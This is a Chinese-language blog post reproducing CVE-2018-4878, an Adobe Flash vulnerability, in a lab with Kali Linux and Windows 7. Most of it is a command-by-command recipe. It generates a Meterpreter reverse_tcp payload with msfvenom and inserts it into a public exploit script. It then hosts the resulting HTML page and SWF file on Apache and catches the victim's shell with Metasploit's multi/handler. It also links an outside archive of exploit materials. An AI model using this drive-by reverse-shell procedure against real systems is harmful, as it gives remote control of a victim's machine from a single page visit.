CVE-2018-4878漏洞复现
开篇闲聊:
写了一篇,意犹未尽,然后决定再来一篇哈哈。
漏洞概述:
CVE-2018-4878是一个通杀Flash 28以前版本的漏洞,这个的威力更强,即靶机点击进入一个页面即可瞬间被攻陷!
可利用的Flash版本号复现环境:
kail linux
Win7(我的Win10 Flash版本到31了。。。)
这里我引用一位大佬的复现素材,整理的很好!(链接:https://pan.baidu.com/s/1dotCoCx0AX8sgUaOqFT9vw 密码:0li)
复现过程:
使用msfvenom生成shell代码
root@wuyou:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.190.134 lport=8888 -f python>1.txt
root@wuyou:~# cat 1.txt
进入CVE-2018-4878-master目录,编辑CVE-2018-4878.py文件
将上面msfvenom生成的代码覆盖掉原来的代码:
修改下面的路径到自己存放的路径
进入存放的目录,执行命令:
root@wuyou:~/CVE-2018-4878# python cve-2018-4878.py
root@wuyou:~/CVE-2018-4878# ls -l
然后将其中两个文件放入Apache目录中,命令我已经给你们准备好了:
root@wuyou:~/CVE-2018-4878# service apache2 start
root@wuyou:~/CVE-2018-4878# cp index2.html /var/www/html/index2.html
root@wuyou:~/CVE-2018-4878# cp exploit.swf /var/www/html/exploit.swf
此时,Kali Linux上Web服务启动,并且具备index2.html这个页面。只要靶机启用flash并访问了这个页面,则可以直接被控制。
这时开启metasploit
root@wuyou:~# msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.190.134
msf exploit(multi/handler) > set lport 8888
msf exploit(multi/handler) > exploit
然后在安装了Flash28的Win7上开启页面192.168.190.134/index2.html
这时渗透机直接获取到Sessions
大功告成!
那么,怎么查看自己的的Flash版本呢?
这里我给大家推荐我自己的方法,在控制面板里找到程序和功能选项
一般就在第一个左右